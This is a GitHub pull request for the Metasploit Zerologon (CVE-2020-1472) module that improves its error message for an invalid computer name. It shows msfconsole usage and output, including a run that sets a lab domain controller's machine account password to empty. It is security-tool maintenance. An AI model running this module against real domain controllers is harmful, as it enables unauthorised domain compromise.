Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update zerologon error handling to output invalid computer name details #16858

Merged
merged 1 commit into from Aug 3, 2022
Merged

Update zerologon error handling to output invalid computer name details #16858

merged 1 commit into from Aug 3, 2022

Conversation

adfoster-r7
Copy link
Contributor

@adfoster-r7 adfoster-r7 commented Aug 3, 2022
edited

Updates the Zerologon module to clearly indicate to the user when the specified remote computer name is invalid

Before

There is a long pause before saying the module didn't work, without any clear indication why:

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run 192.168.123.13 nbname=ADF3
[*] Running module against 192.168.123.13

[*] 192.168.123.13: - Connecting to the endpoint mapper service...
[*] 192.168.123.13:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[*] 192.168.123.13:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[-] 192.168.123.13:49667 - Auxiliary aborted due to failure: unknown: Failed to authenticate to the server by leveraging the vulnerability
[*] Auxiliary module execution completed

After

The module immediately prompts the user that the computer name is most likely wrong:

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run 192.168.123.13 nbname=ADF3
[*] Running module against 192.168.123.13

[*] 192.168.123.13: - Connecting to the endpoint mapper service...
[*] 192.168.123.13:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[*] 192.168.123.13:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[-] 192.168.123.13:49667 - Auxiliary aborted due to failure: unexpected-reply: (0xc0000122) STATUS_INVALID_COMPUTER_NAME: Indicates a name that was specified as a remote computer name is syntactically invalid.
[*] Auxiliary module execution completed

Verification

  • Start msfconsole
  • use admin/dcerpc/cve_2020_1472_zerologon
  • Set rhost and rbname to your Windows Domain Controller
  • Verify there are details output when the nbname is wrong

@adfoster-r7 adfoster-r7 force-pushed the update-zerologon-error-handling branch from a32fc72 to 94f25bd Compare August 3, 2022 14:28
@adfoster-r7 adfoster-r7 force-pushed the update-zerologon-error-handling branch from 94f25bd to 8253e99 Compare August 3, 2022 14:32
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 3, 2022
smcintyre-r7
smcintyre-r7 approved these changes Aug 3, 2022
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

That's a pretty nice improvement.

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.96

[*] 192.168.159.96: - Connecting to the endpoint mapper service...
[*] 192.168.159.96:49669 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[*] 192.168.159.96:49669 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[+] 192.168.159.96:49669 - Successfully authenticated
[+] 192.168.159.96:49669 - Successfully set the machine account (WIN-3MSP8K2LCGC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run NBNAME=FOOOOOO
[*] Running module against 192.168.159.96

[*] 192.168.159.96: - Connecting to the endpoint mapper service...
[*] 192.168.159.96:49669 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[*] 192.168.159.96:49669 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[-] 192.168.159.96:49669 - Auxiliary aborted due to failure: unexpected-reply: (0xc0000122) STATUS_INVALID_COMPUTER_NAME: Indicates a name that was specified as a remote computer name is syntactically invalid.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >

@smcintyre-r7 smcintyre-r7 merged commit b42c26b into rapid7:master Aug 3, 2022
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates zerologon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meanful message.

@adfoster-r7 adfoster-r7 deleted the update-zerologon-error-handling branch August 3, 2022 22:50
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 4, 2022
@smcintyre-r7 smcintyre-r7 added rn-enhancement release notes enhancement and removed rn-modules release notes for new or majorly enhanced modules labels Aug 4, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
easy enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@adfoster-r7 @smcintyre-r7 @bwatters-r7 @gwillcox-r7